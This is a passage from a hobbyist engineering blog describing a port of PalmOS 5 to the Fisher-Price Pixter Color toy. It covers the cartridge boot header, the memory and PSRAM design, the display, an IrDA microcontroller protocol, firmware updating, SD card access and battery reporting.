        1. Yes, you can try it!
      3. Vibrate & LED support
      4. Networking support (WIP)
        1. False starts
        2. The scary way forward
        3. Those who study history...
        4. On to OS 5's Net.lib
        5. I found a bug!
        6. Well, that was easy...
        7. NOT!
        8. More reverse engineering
      5. 1.5 density support
        1. Density basics
        2. How does it all fall apart?
        3. How do we fix it?
        4. And now, for some polish
      6. Dynamic Input Area/Pen Input Manager Services support
        1. DIA/PINS basics
        2. How it works pre-garnet
        3. The intricacies of writing a DIA implementation
      7. Audio support
        1. PalmOS Audio basics
        2. PalmOS sampled audio support
        3. Why audio is hard & how PalmOS makes it easy
        4. How rePalm does audio mixing
        5. How do assembly and audio mix?
        6. rePalm's audio hw driver architecture
        7. Microphone
      8. Zodiac support
        1. Tapwave Zodiac primer
        2. The reverse engineering
        3. The "GPU"
        4. Other Tapwave APIs
    12. Real hardware: reSpring
      1. The ultimate Springboard accessory
      2. Interfacing with the Visor
      3. Version 1
      4. Bringup of v1
      5. Let's stick it into a Visor?
        1. Getting recognized
        2. Saving valuable space
        3. Communications
        4. Early Visor support
      6. Making it work well
        1. Initial data
        2. Sending display data
        3. Buttons, pen, brightness, contrast, and battery info
        4. Microphone support
      7. Polish
        1. Serial/IrDA
        2. Alarm LED
        3. Software update
      8. Onboard NAND
        1. You wanted pain? Here's some NAND
        2. To write an FTL...
      9. One final WTF
    13. More real hardware
      1. rePalm-MSIO
        1. MCU selection
        2. The bugs...
        3. MSIO low level
        4. MSIO high level
        5. MSIO performance
        6. Other loose ends
      2. AximX3
      3. STM32F469 Discovery Board
      4. RP2040
        1. It is possible!
        2. Memories
        3. PACE again
    14. So where does this leave us?
    15. Source Code
      1. Source intro
      2. Building basics
      3. Building PACE
    16. Article update history
    17. Comments...

Blog-style updates

BLOG

I have decided to change the format of this article to be more blog-like as further development is being done in parallel on many fronts and will be hard to follow if I just update the main (now-huge) article body. So what has transpired since?

Dec 5, 2025 - Pixter

Pixter Color showing PalmOS 5.2.1 info panel

Getting started with Pixter

Fisher-Price (owned by Mattel) produced some toys in the early 2000s under the Pixter brand. They were touchscreen-based drawing toys, with cartridge-based extra games one could plug in. Pixter devices of the first three generations ("classic", "plus", and "2.0") featured 80x80 black-and-white screens, which makes them of no interest for rePalm. The last two generations of Pixter ("color" and "multimedia") featured 160x160 color displays. Now, this was more like it! Pixter was quite popular, as far as kids' toys go, in the USA in the early 2000s. A friend brought it to my attention a year ago as a potential rePalm target. The screen resolution was right, and looking inside a "Pixter Color" showed an ARM SoC - a Sharp LH75411. The device had sound (games made noises), and the touch panel was resistive. In theory - a viable rePalm target indeed.

My initial work involved figuring out how the last two generations of Pixter work and how to get code execution on them, which I wrote a separate article on (which may not yet be publicly up -- I am but one man and editing takes time). The short of it is that the cartridge slot includes access to the full memory bus and two chip-select lines, allowing one to connect two memories or memory-like things to the device. The first (seen at PA 0x48000000) must connect to a 16-bit-wide ROM which would normally contain the game. I would put a PalmOS ROM there, of course. However, it would need to be formatted such that the Pixter boots it as a game, instead of assuming that the cartridge is invalid. Reverse engineering the Pixter ROM showed me the minimal way to make my ROM bootable. This requires a simple 44-byte header, with the following values at the following offsets: u32@0x00 - 0xAA5566CC (magic number), u16@0x04 - 0x0001 (required version number), u16@0x06 - 0x293c (VM instruction to do a native callout to offset 0x28), u32@0x10 - 0x48000006 (address where the first VM instruction is to be seen; I use 0x48000006), u32@0x28 - 0x48?????? (address where Pixter OS will jump to in THUMB mode, where our actual execution will begin). I place some code before the 0x28 word to switch to ARM mode and disable interrupts, then jump to my PalmOS ROM, which will start at offset 0x30 (for roundness). Thus, after this now-48-byte header, there can follow a normal PalmOS ROM. Pixter Color contains 128KB of RAM on the motherboard, which is too little for PalmOS, so we'll use the second chip-select line to attach some RAM. Pixter Multimedia has 4MB of SDRAM onboard, which makes it able to run PalmOS without external RAM.
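For concreteness, here is that header as a C struct (a sketch: the field names are mine, offsets match the text, and the region before the 0x28 word is where the mode-switch code goes):

    #include <stdint.h>

    /* Sketch of the minimal Pixter boot header described above.
       Field names are invented for illustration. */
    struct PixterCartHeader {
        uint32_t magic;        /* 0x00: 0xAA5566CC                            */
        uint16_t version;      /* 0x04: 0x0001                                */
        uint16_t vmCallout;    /* 0x06: 0x293c, VM callout to offset 0x28     */
        uint8_t  pad1[8];      /* 0x08..0x0F                                  */
        uint32_t firstVmInsn;  /* 0x10: 0x48000006                            */
        uint8_t  shim[20];     /* 0x14..0x27: ARM-mode switch + IRQ disable   */
        uint32_t nativeEntry;  /* 0x28: 0x48??????, Thumb-mode entry point    */
        uint32_t pad2;         /* 0x2C: pad to 0x30, where the PalmOS ROM starts */
    };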

Initial Slow Pixter Color Bringup

The pinout of the SoC on the Pixter Color was easy to work out, since the chip is in an LQFP package and I could buzz out the pin connections. The User's Guide for the Sharp LH75411 was available. Debugging on real hardware is hard, of course, so I wrote a Pixter Color emulator, as detailed in my Pixter article. With this, I was able to bring up a minimal PalmOS image relatively quickly. Then, it was on to making it work on the real device. This was quite a bit more work. George designed a board with a 1MB NOR flash for the OS and some RAM for PalmOS to use, and JLC assembled a few for me. Unfortunately, a few decisions made during Pixter Color's design complicated this project.

Memories are connected to a SoC over a bus. A bus has a width, denominated in bits. For 32-bit ARM chips, external busses are usually 8, 16, or 32 bits wide. The wider the bus, the more bits can be sent over it in the same number of clocks, meaning that it is faster. Obviously, if you write a properly-aligned 32-bit word in your code, a 32-bit bus can transfer it to memory in one transfer. A 16-bit bus will need two -- one for the lower halfword, one for the higher. An 8-bit-wide bus will need 4 transfers to transfer the word, thus being 4 times slower. However, this does not mean that a narrower bus is always slower. Consider the case of writing a single byte. The 8-bit-wide bus can do this in a single transfer. What do the 16 and 32 bit busses do in this case? Guess!

There are two guesses you could have come up with. The first is: read a bus-width-sized quantity of memory, modify the requisite byte, and then write a bus-width-sized quantity of memory back. This would require two bus transactions for both the 16 and the 32 bit wide busses. This is not what is done, for a variety of reasons which are quite out of scope here. What is actually done is that besides the address, data, and control lines, the wider busses also have a few extra lines, which are called "byte lane select" lines. They tell the memory which of the bytes in the bus-width-sized memory location being addressed are active. So, to write a byte on a 32-bit-wide bus, only one of the byte lane select lines will be active, and the memory will not overwrite the other 3 bytes. This does mean that the memory chips need to support this sort of thing, and they do. Of course this is not an issue for reads - the unneeded 3 bytes of memory for a byte-sized read on a 32-bit bus can just be ignored by the SoC. Easy!

So, what were the design decisions in Pixter Color that made my life harder? Pixter Color's external cartridge slot exposes 24 bits of address and 16 bits of data. Since ROM is read-only, it needs no byte lane selects and indeed runs in 16-bit-wide mode. Sadly, byte lane select lines are NOT brought out to the cartridge slot. So, what would happen if I were to attach 16-bit RAM without them? Given the explanation above, it is clear -- reads would work fine. Word and halfword writes would work fine too. Byte writes would corrupt the neighboring byte. Clearly this is not going to work for booting PalmOS, which expects all RAM to be byte-addressable. What options are left? Just one -- RAM must be attached in 8-bit-wide mode. This does not require byte lane select lines and will correctly work for attaching RAM to Pixter Color via the cart slot. Sadly, as described earlier, this means that this memory is slower for larger access sizes, which are more common.

There is more to consider here. When memory is accessed, it needs some time from being given an address and being asked to read it until it is expected to reply. The same applies for writes. To give it time, wait states are inserted. A normal bus access with no wait states might reasonably take two bus cycles to read a single bus-width-sized memory amount. The first cycle will present the address to the memory chip, and by the second, it is expected to have a reply ready to be read from the data lines of the bus. If the memory cannot reply that fast (in one cycle, basically), it will need wait states. What determines whether it can reply? Memories come in speed grades, which among other things, tell you how fast they can reply. For example, on my Pixter Color cartridges, I use "-70" memory which can reply in 70 nanoseconds. The speed of light is also nonzero, and traces on boards and in connectors have inductance and capacitance, which, together, mean that the signals take time to travel from the SoC to the memory and back. Taken all together, one needs to configure the wait states such that the memory has enough time from truly seeing the control signals to the SoC truly seeing the replies. In Pixter Color's case, at the rates I run the bus, this means the external memory runs with 2 wait states. The practical upshot of this is somewhat sad. Imagine a typical 32-bit read of external memory. Since the bus is 8 bits wide, this will take 4 accesses. With 2 wait states, each access takes 4 cycles. This means the entire 32-bit-wide read takes as much as 4 x 4 = 16 cycles. Now, normally, the SoC's cache would absorb this slowness for reads and the write buffer would help on writes. Which brings us to...

The Worst ARM SoC I've Seen Yet

Pixter Color playing Warfare Inc game

The SoC in Pixter Color has the most minimal ARM7 configuration I've ever seen. The ARM7 CPU design is sold by ARM with a few configuration options that one decides on before instantiating it on a chip. One of the options is whether there is a cache, and of what size. Sharp went with "no thanks". Strike one! The next is whether there is an MMU. This is a piece of hardware that allows very granular memory protection and mapping. Sharp went with "no". Strike two! Lacking that, there is an MPU option. This is a simpler memory protection unit - no mapping ability and a limited number of protection regions, but it is still better than nothing. The NintendoDS CPU uses this option, for example. This configuration is so simple, it basically costs no extra silicon at all -- no reason not to choose it. Sharp went with "nah". Strike three!

But this gets even more fun, actually. ARM architectures before version 6 did not really support unaligned memory accesses. An unaligned write acted as if the lower address bits were zero, while an unaligned read would rotate the read word such that the "addressed" byte was at the bottom. Neither of those behaviours acts like real unaligned memory access. That is to say that unaligned accesses were almost always a logic error. To catch them, ARM cores have a configuration bit to enable "alignment checking" which will cause an exception if an unaligned access is attempted. Since such accesses are almost always a bug, this checking should almost always be enabled. To configure whether it is or is not enabled, one uses coprocessor 15, which itself is optional. Sharp went with "ooh...optional, eh? NOPE!". Lacking a coprocessor 15, all configurable options become hardcoded to a set value with no ability to change them. In the case of the SoC in Pixter Color this means that alignment checking does not exist, since Sharp could not be bothered to enable it (at a cost of a dozen transistors, no more). Additionally, this means the exception vectors are always at 0x00000000, since the ability to relocate them to 0xffff0000 is configured by cp15. This forces us to configure some memory to exist at address zero, which makes trapping NULL-pointer accesses impossible. There goes another error class we cannot trap. We're at five strikes by now... Jeez, Sharp!

Without a cache, our 63MHz CPU ends up spending most of its time waiting on memory. Sharp did put 16KB of TCM (tightly coupled memory) into the chip. This memory is accessible in a single cycle, making it rather fast. It can also appear anywhere in the address space (it is movable and overlays anything). But it is only 16KB, which is very little. There is also 32KB of eSRAM (embedded SRAM) in the chip, which operates with no wait states and is 32 bits wide. This means that accessing it takes two cycles per word -- still quite fast. Pixter Color's designers added 128KB of RAM onto the motherboard, as I had mentioned earlier. It is on a 16-bit-wide bus with one wait state. This means that for 32-bit reads, it takes 2 x 3 = 6 cycles per access, making it more than twice as fast as the external RAM I put on my external cart. Sadly, 128KB is also not that much in PalmOS 5's terms. It does give me a place to put the framebuffer and kernel globals. Better than nothing, I guess.

Pixter Memories

Given the complete lack of an MMU or an MPU, how can we protect the PalmOS storage heap from unintended or accidental modification? There is no obvious way. It is not strictly mandatory, of course, but highly desired. An idea came suddenly, while brainstorming how to connect more RAM to the device. Recall those byte lane select lines I explained earlier. They are only meaningful for writes, since for reads, the SoC can just ignore data it does not need. But what do memory chips actually do with those lines on reads? It turns out that they do not ignore them; they use them to mask output lanes. This means that a 16-bit-wide RAM can be used as an 8-bit-wide RAM of double the size by connecting its lower 8 data lines to the higher 8 data lines, connecting an unused address line to one byte lane select, and the same address line through an inverter to the other byte lane select. Think about it (or look at the schematic below).

This scheme can be expanded further to use a 2-to-4 decoder to connect two x16 RAMs as a x8 RAM with 4x the size. Why am I telling you this? Because the largest PSRAM that could be located for this project was 16x4M, meaning that each chip of it has 4 mega words of 16-bit-wide memory (8MB). Two such chips make 16MB of memory, which is as much as Pixter's 24 external address lines allow addressing. The 2-to-4 decoder makes this possible. Now, back to protection. Say we decide up front to use the first 1/4 of the external RAM as the dynamic heap, and the last 3/4 as the storage heap. The logical OR of the top address bits would be one for any storage access and zero for any dynamic memory access. Add one more gate and a GPIO pin, and we have the ability to ignore writes to the storage area by blocking the "write enable" signal. Now, this will not tell us that an access was blocked - the Pixter cart slot lacks any way for us to send an error back to the SoC - but at least the erroneous write would be ignored. This scheme was implemented, tested, and found working! Cool!
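In C-ish pseudologic, assuming the 16MB (24-address-bit) space just described, the gating amounts to something like this (a sketch of the idea, not the actual board netlist):

    #include <stdbool.h>
    #include <stdint.h>

    /* Sketch: dynamic heap in the first 1/4 of the 16MB external RAM,
       storage heap in the last 3/4, so any storage access has a nonzero
       value in the top two of the 24 address bits. */
    static inline bool write_enable_out(uint32_t addr, bool write_enable_in,
                                        bool protect_on /* the GPIO */)
    {
        bool is_storage = ((addr >> 22) & 0x3) != 0;
        return write_enable_in && !(is_storage && protect_on);
    }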

Why was PSRAM used? Pixter Color's SoC lacks any support for dynamic memory, which is what we use nowadays. Real SRAM (static memory) does not come in megabyte sizes, at least not on the budget I had in mind. PSRAM is a nice middle ground. It is dynamic memory with internal mechanisms to refresh itself. Externally, it pretends to be static memory. It is not as cheap as dynamic memory, but when you need huge SRAMs, PSRAM might be all you can realistically get.

Pixter Color showing rePalm boot screen surrounded by 8 rePalm Pixter Color cartridges

The first revision boards had just 1MB of flash, as I had mentioned. This is rather little to squeeze a full PalmOS 5 image into. I did manage, with a lot of effort, but it was tight, and I had to make some tough decisions and even rewrite one library in assembly to save ten bytes! Needless to say, revision 2 boards featured a much more roomy 8MB flash chip. This allowed for inclusion of all the standard PalmOS PIM apps as well as some games and utilities. There is even 2MB still free in ROM. The only issue was that this part was not stocked by JLC, forcing me to order it separately and wait for them to receive it before they could assemble the boards for me. As the PSRAM and the Flash are both BGA-packaged chips, assembling at home was a non-starter.

Pixter Displays

The first Pixter Color I got my hands on (and, really, most of the Pixter Color devices produced) featured an STN color display of such poor quality that I struggled to call it "color". If you recall color laptop displays from the early 1990s, you can imagine this one too. The colors shifted with the slightest head movement, and the contrast slider allowed free adjustment from "muddy washed out dark browns" to "muddy washed out light greys" without any good middle "passable colors" state. Well, you play with what you have. STN displays need their controller to work hard to show gradations of color. This is done by temporal dithering (quickly alternating a pixel between on and off to create the illusion of a middle state). The ditherer in the SoC allowed 15 brightness values per color channel. Yes, not 16. Indeed there are 16 values, but the middle two produce the same brightness, as is clearly documented in the SoC's user guide. This means that with this SoC, this display could display 15 x 15 x 15 = 3375 colors.

The display controller supports direct color mode, but sadly not in the normal RGB565 mode, but in the who-the-hell-asked-for-this XRGB1555 mode which PalmOS (and literally every other piece of software to ever use 16-bits-per-pixel displays) has no use for. Oh well, it's not like this display could display enough colors to make the 16-bits-per-pixel mode worth it. I decided to just support the 1, 2, and 4 bits-per-pixel greyscale modes and the 8-bits-per-pixel paletted color mode. This should be enough to run most PalmOS 5 software and, given the shittiness of this device, one should grade on a curve! When PalmOS sets a palette entry, I pick the closest of the 3375 colors to the requested RGB888 triple.
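The closest-color pick can be done per channel; a sketch, assuming simple per-channel rounding is close enough (the actual matching metric is my assumption):

    #include <stdint.h>

    /* Sketch: quantize one 8-bit channel onto the 15 usable brightness
       levels (0..14) that the ditherer provides. */
    static uint8_t quantize_channel(uint8_t v)
    {
        return (uint8_t)((v * 14u + 127u) / 255u);
    }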

Making Pixter IrDA work

Pixter Color receiving a hand-drawn note over InfraRed

Most SoCs' UARTs support IrDA SIR modulation, allowing one to simply connect an IrDA transceiver to the pins and immediately send and receive bytes via InfraRed. Of course, the minimum-spec SoC in the Pixter Color does not have this option. I bet they saved a whole 0.0001 square millimeters of silicon by not having this option, the stingy bastards! I wanted InfraRed to work, though. There are chips that simply convert normal serial port signals to IrDA SIR modulation and back. This would be the simple solution, but due to how they work, they also need a stable clock input at the precise rate of 16x the current baudrate. As making IrDA work properly requires the ability to negotiate a variable baudrate between 9600bps and 115,200bps, this means I'd need the ability to drive out a stable variable clock on a cartridge pin. While this SoC can output a given clock, none of the pins capable of it connect to the cartridge slot. No, this approach would not work. What alternatives are there?

Well, I did say that most SoCs' UARTs support IrDA SIR modulation. This is also true of small cheap microcontrollers, and even Chinese clones of small cheap microcontrollers. Thus, the new plan was to use a simple microcontroller to talk IrDA to an InfraRed transceiver and normal serial port protocol to the SoC, over the cart slot. Luckily, among the various pins connected to the cart slot, there are two complete serial ports available for functional assignment to some of the pins. Score! One can be used for serial debugging and the other -- for this. A thought occurs, however. We need to not only send data to and from this microcontroller, but also control signals, eg to tell it to adjust the baudrate, or to update its firmware. This means that we need to talk to it at a higher rate than InfraRed ever would use, to provide for the extra overhead of whatever protocol I invent to make this all work. I decided on 2x the max IrDA rate - 230,400bps. The microcontroller chosen was the very cheap APM32F003F6U6 from Geehy. It had two serial ports with IrDA abilities, could be clocked from an external oscillator at a frequency quite amenable to generating UART clocks (11.0592 MHz), and was available as a stock part at JLCPCB. I figured that it was just like any other cheap Cortex-M0 and I would be able to find a common language with it. This turned out to be true, and it took only an hour to get CortexProg to program it.

Getting this microcontroller to do UART was harder. The documentation was rather sparse, and I searched in vain for any way to assign a given pin to be a GPIO or a function pin. This is typical in most microcontrollers, including other families of MCUs from Geehy. But not this one, evidently. Eventually, I figured out that if you enable a peripheral, it simply takes over the requisite pins on this chip. This, however, did not explain why I could get UART1 working, but not UART3. Eventually, I realized that while UART1 has simply an enable bit, UART2 has that plus an extra "ENABLE" register which needs to be set to enable it, while UART3 has that plus an extra-extra "IO ENABLE" register that also needs to be set. The docs were not at all clear about this. This got me to another impasse. UART3 receive worked fine, but transmit did not; the pin just sat at zero volts. It is, of course, at this point that I noted that the pin that UART3 uses for TX is a hardware open-collector pin, meaning that it simply cannot source any current, only sink it. In human terms, this means: it needs a pull-up resistor to be of any use at all whatsoever. So, I enabled the pull-up on the Pixter Color's SoC side of that wire, and I had bidirectional communication!

Designing protocols over UARTs is a bit of a pain. Almost any noise on an otherwise-idle line will turn into a 0xFF byte. Any character can be lost to a framing error if noise causes its stop bit to appear low. And any character can be corrupted by noise during its data bits. Parity can be used to add some resilience to this, allowing, at least, likely detection of corrupted bytes. But parity support is not always present and does not always work. Since any byte can also go missing, how does one design a resilient protocol? If you send a length byte, and it gets corrupted, the receiver might be waiting for a lot more data than you intend to send, and thus get stuck. Conversely, the receiver might think the packet ended sooner than it really did and interpret the next byte of data as a packet header -- not good. Many ways can be invented to resolve this. A typical one is to simply somehow mark "start of packet", allowing the receiver to resynchronize in case of a sync loss. A special byte can be used, but then that byte is not allowed in the packet contents. It must be escaped somehow. And what if the packet being sent happens to be made of just that byte? Escaping it might blow the packet size up by a factor of two. Another common method is to use the UART in 9-bit mode, and just use the top (8th) bit as a "start of packet" marker. This has the benefit of not needing any escaping. The issue is that 9-bit-character support is not uniform among all the UARTs out there. Pixter SoC's UARTs, for example, do not support this. Not good. A third method is using a BREAK. This is when the data line for the UART is low for a full character length, including the stop bit. Most UARTs support receiving this and noting it as such. Sending it is a bit harder. Some UARTs, like the one in the APM32F003F6U6, can send a proper-length break simply by setting a bit and waiting for it to self-clear. This is not common. Most commonly, there is simply a "SEND BREAK" bit that lowers the TX line, and it is up to you to make sure you keep it low long enough. Annoying. This is what the Pixter SoC can do. At least, this is what it advertises being able to do. In reality, I found that it worked unreliably. Sometimes using this feature would place the UART into a weird state where it could not transmit again. I found a workaround: I can reconfigure the TX pin as a GPIO and literally just take it low, wait, then reconfigure it back. The UART unit need not even know, and it does not get wedged! Win!

The protocol I designed is simple but not symmetric, since while Pixter might have a lot of control data to send to the microcontroller (configuration, updates), the microcontroller rarely has much to say to the Pixter other than what InfraRed data it got. From microcontroller to Pixter, it is as follows: any byte received is an InfraRed data byte, unless preceded by a BREAK. If it was, the top 2 bits determine what it is. 00 means that it is a start byte of a longer packet; the lower 6 bits give the packet type. Each packet type has a fixed length. 01 means that it is a lower nibble of a non-first byte of a longer packet; bits 4 and 5 must be zero. 10 means that it is a higher nibble of a non-first byte of a longer packet; bits 4 and 5 must be zero. 11 means it is a one-byte control packet. You can see that "longer packets" thus get blown up in size by a factor of 4. This is fine since this is rare; the only such packet defined is the "version info packet". Actual IrDA data arriving can interrupt transmission of such packets, since any byte not preceded by a BREAK is treated entirely differently. The one-byte control packets allow for flow control. This is needed since this interface is at 230,400bps while IrDA is at 115,200bps max. Pushback ability is needed from the microcontroller to PalmOS to keep it from overflowing the microcontroller's TX buffer. This range is also used to signal various framing errors in received IrDA data. For more details, you can see "pixterComms.h".
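As a C sketch (the handler names are mine; the real definitions live in pixterComms.h), the receive-side dispatch is roughly:

    #include <stdbool.h>
    #include <stdint.h>

    /* Hypothetical handlers standing in for the real protocol code. */
    void irda_rx_data(uint8_t b);
    void packet_start(uint8_t type);      /* fixed length per type     */
    void packet_nibble_lo(uint8_t nib);   /* bits 4..5 must be zero    */
    void packet_nibble_hi(uint8_t nib);
    void control_packet(uint8_t code);    /* flow control, error codes */

    void on_mcu_byte(uint8_t b, bool after_break)
    {
        if (!after_break) {
            irda_rx_data(b);              /* plain InfraRed data byte  */
            return;
        }
        switch (b >> 6) {
        case 0: packet_start(b & 0x3f);     break;
        case 1: packet_nibble_lo(b & 0x0f); break;
        case 2: packet_nibble_hi(b & 0x0f); break;
        case 3: control_packet(b & 0x3f);   break;
        }
    }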

The protocol from the Pixter to the MCU is different. Here, a BREAK is sent before the start of a packet. Then comes a byte that describes the packet. The top 2 bits determine packet type. 00 - simple command, where bits 0..5 determine command type, each with a fixed length. Examples are: "get version info", "reset", "set IrDA config". 01 - IrDA data. Bits 0..5 give data length minus one. That many bytes of data to send follow. 10 - firmware update data. Same length encoding as for IrDA data. 11 - reserved for future use. Firmware data is further decoded based on the first few bytes. Again, for details see "pixterComms.h". When PalmOS starts trying to send IrDA data, a packet is sent off to the microcontroller right away, no waiting. This means that usually it just contains one byte of data. By the time it is sent, PalmOS might have added 5 or 6 more bytes to the TX buffer, and those are sent in a longer packet; by the time that is sent, much more data has been added to the TX buffer, and maximum-length packets can be sent to the MCU. Keep in mind also that Pixter-to-MCU comms are at least 2x as fast as IrDA comms, which helps here. This design minimizes delays in starting to get the data out. This matters since IrDA protocol timeouts give a limited amount of time to START receiving data, with more time available once the data starts coming in.

A screenshot of Saleae Logic software debugging InfraRed communications with two lines depicting UART traffic and two depicting IrDA traffic, one inverted

Debugging IrDA was a huge pain in the posterior, exacerbated by the fact that there exist no good working IrDA SIR decoders for Saleae Logic. Without my Logic 16 PRO and various analyzers, I'd be very lost. Seriously, this thing is a huge force multiplier; if you do not have one, you are developing on hard mode for no reason. I do not get paid to say this, I just really love this thing! In any case, since there was no analyzer for IrDA SIR, I wrote one. It properly decodes all bit lengths and parity settings, marks start and stop bits, shows errors, and supports both inverted (RX) and normal (TX) signalling. Most importantly, it allowed me to debug a few issues I had caused. As I had done in the past, I sent my analyzer's source to the good people at Saleae for consideration for inclusion in the Logic software, so that no others will ever need to suffer the indignity of decoding IrDA SIR one bit at a time by hand.

The practical upshot of all of this is that it all works! IrDA communications work. MCU firmware updates also work. For that last one to work, there is a tiny (400 bytes) bootloader in the MCU that copies an uploaded validated image to the main flash area on boot if the version field differs. If the image was not fully uploaded, it will not be seen as valid. If the copy is interrupted, it'll resume on next boot. There is no way to brick the MCU as long as the bootloader is not touched!

There was one more thing the MCU needed to do. There is a pin on the cart slot that needs to be high for the Pixter Color to believe that a cart is inserted. After this check, the pin is usable for ... whatever. I ended up not using it for anything, but it is wired to the MCU. This does mean that soon after boot, the MCU needs to raise it and keep it high until rePalm takes over from Pixter's OS. It does this. Without this code, Pixter Color will boot-loop as long as the cart is inserted, neither booting nor giving up, forever. Curiously, Pixter Multimedia does not care about this pin and never checks it.

Getting and Flashing the Pixter Carts

Pixter Color cart Schematic

Since the cartridge boards feature a parallel 16-bit-wide NOR flash, I needed some way to program them initially. George designed and JLCPCB manufactured a flasher board for me, based on the wonderful RP2350, which is pretty much the best microcontroller you can get today (not merely an opinion, a true fact, fight me!). This board also has a cart slot similar to the one in Pixter, the VERY not cheap 302-060-221-201. I use this to program each Pixter Color cart once. I then use CortexProg to program the microcontroller. After this, self-firmware-update from inside PalmOS can be used for flashing, as long as you do not accidentally flash a broken image!

I wrote a PalmOS updater that loads the update ( /ROM.BIN ) from an SD card into RAM, then disables interrupts (since various drivers might be part of the OS image which we are about to slowly, partially erase and overwrite), and then flashes the NOR flash with the new image. Before doing this, it also updates the MCU firmware ( /FIRMWARE.BIN ), if the replacement firmware has a higher version number. The entire process takes slightly more than four minutes, making it much faster than manual flashing with the flashing tool described above. It also brings updates to users of these carts who do not have a flashing tool.

Did I say users? Yes! Fifteen of these were manufactured for those who wanted them and are now with their happy users. The cost to manufacture them ended up being around $50 each, making them a bit more expensive than a used Pixter Color on eBay. There is a chance that I'll run another production run, so if you want one, email me. Alternatively, you can have your own boards made and assembled using these files. Board thickness should be 1.2mm. Initial flashing is left as an exercise to the reader.

Pixter Polish

Pixter Color running Palmkedex showing Marill's page

Now that basic PalmOS 5 worked (slowly), it was time for some polish. First of all, those buttons below the screen initially did nothing. But why not make them do something? The first one looked like a pencil. I wired it up to send a special unused keycode, and then wrote a tiny hack called PixterEnabler that catches this key and toggles onscreen writing. Since there was no documented API to control on-screen writing, I had to reverse-engineer the GrafitiAnywhere module. While doing that, I found that it had a never-before-used capability to change the ink color. I went with bright green.

The third button from the right was used in Pixter's native OS to bring up settings, which include contrast adjustment. I wired this up to bring up the PalmOS contrast adjustment dialog. Reverse engineering how Pixter Color controls display contrast took some work. It is weird. It uses an R-2R resistor ladder and 4 GPIO pins to create one of 16 voltage levels that are then fed as an input to the display driver. Figuring it out took a while; wiring it up to PalmOS took all of a few seconds. Cool! This would do for now. More later.

Pixter Color's CPU is simply not fast enough to do sampled audio playback. Lacking a real codec with a DAC, one would have to use the PWM unit, and take an interrupt every sample to reset it to a new value. Given the slowness of the CPU and memory subsystem, this would not work. I did try it. 44,100Hz uncompressed WAV playback used about 98% of the CPU cycles. This means that games with audio would be too slow to play, and realtime MP3 decoding is a fevered dream of a madman. Given this, I decided to instead support the "simple sound" API of PalmOS. You may know it as "the beeps and the boops" that the earlier devices used. This can be done by simply programming the PWM unit once at "tone start" and again at "tone end". This allows simple tunes, alarm sounds, and UI clicks to work. Good enough.

Pixter devices also have an internal melody chip, as my main Pixter article mentions. I thought that it would be cool to allow starting and stopping melody playback from PalmOS. The timing on the control interface is rather tight, forcing me to write the code in ARM assembly and use the rePalm-specific high-resolution timer API. Nonetheless, it worked, and you can indeed start and stop melody playback using the PixterMelodyCtl app. Since the playback is entirely independent of the OS, it will continue until stopped, including across firmware updates. I did code PixterMelodyCtl to send the "stop melody" command on PalmOS reset, so that at least it would stop on reboot. A video of this is in the rePalm photos album linked-to above.

Pixter Color actually has one physical button. It is the pinhole on the back that the native Pixter OS uses to cause pen recalibration. This makes sense since a messed-up calibration would make tapping on-screen buttons impossible, so a real button is needed. I wired this up in PalmOS as hard button #1, and it can be mapped to any application using the usual Buttons Prefs Panel. I considered wiring this up as a soft reset button, as it is reminiscent of those, but the device has a perfectly working power switch on the side, toggling which causes a perfectly good reset. Actually making this button work was nontrivial. You see, it is not wired to any pin that can cause an interrupt to the CPU. Instead, in the timer-overflow handler which runs in FIQ mode (for speed) at around 120Hz, I check its state, do some quick debouncing, and if it changed state, enqueue a normal low-priority interrupt that will later be handled to deal with it. The same check-and-debounce-in-periodic-FIQ method is used to detect SD card insert/remove, for the same reason.

There is, of course, no SDIO support in Pixter Color's SoC. There is SPI support, but none of the pins available on the cart slot are connected to the SPI unit in the SoC, so that would be of no use either. I ended up bit-banging the SPI interface for SD card support in assembly. You'll recall that the CPU in Pixter Color is super slow, and so is the memory. I spent a little bit of my fast TCM to keep these SPI bit-banging routines fast. The final result is that my code reaches access speeds around 3.8Mbit/s, which is not all that terrible. Of course, this uses the CPU, so nothing else can really transpire while this goes on. Oh well. It does work, allowing backups to card and loading games from card!
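The actual routines are in assembly and live partly in TCM, but the shape of a mode-0 bit-banged transfer is familiar (a C sketch with hypothetical gpio helpers, not the real code):

    #include <stdint.h>

    /* Hypothetical GPIO helpers standing in for the real register pokes. */
    void gpio_write(int pin, int level);
    int  gpio_read(int pin);
    enum { PIN_SCK, PIN_MOSI, PIN_MISO };

    static uint8_t spi_xfer_byte(uint8_t out)
    {
        uint8_t in = 0;
        for (int i = 7; i >= 0; i--) {
            gpio_write(PIN_MOSI, (out >> i) & 1);  /* present data bit */
            gpio_write(PIN_SCK, 1);                /* clock it in      */
            in = (uint8_t)((in << 1) | (gpio_read(PIN_MISO) & 1));
            gpio_write(PIN_SCK, 0);
        }
        return in;
    }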

Battery State

Pixter Color showing a battery voltage of 5.34V at a charge state of 73%

Luckily, converting a voltage to an approximate state of charge for alkaline batteries is trivial. Once I figured out how the battery voltage was hooked up to the SoC's ADC and at what scale (0.25, evidently), I was able to measure battery voltage. A conversion of battery voltage occurs at every pen down, every pen movement, or every 500ms. These values are smoothed and converted to a percentage that is properly handed to PalmOS. Curiously, in PalmOS 5, there is no official or even unofficial API to get battery voltage, only percent charge. This is actually not unreasonable, since battery technologies evolve and user-level applications have no business trying to understand voltages. The current battery state of charge is enough for applications. That being said, in PalmOS 4, there was such an API. In PalmOS 5, for compatibility, it still exists, but in a fake way. It will read the current state of charge and map it linearly onto the 3.7V - 4.2V range. I decided that it would be hilarious to expose the true battery voltage to applications that ask for it, so I added a small hack in my DAL to do so. Now applications using PalmOS 4 APIs can query and properly display the true battery voltage. The reason this is funny is because Pixter runs on 4 series-connected AA batteries, which means it'll see around 6V when full. No PalmOS device before had ever run on such a high battery voltage, and I was curious what applications would do with this, and whether anything would break. Nothing did.
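That stock compatibility shim is easy to picture (a sketch; the units and names are mine):

    #include <stdint.h>

    /* Sketch of the stock PalmOS 5 fake-voltage behavior described above:
       map percent charge linearly onto 3.7V..4.2V, in centivolts here. */
    static uint16_t fake_battery_centivolts(uint8_t percent)
    {
        return (uint16_t)(370u + ((uint32_t)percent * (420u - 370u)) / 100u);
    }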

ARM7 quirks

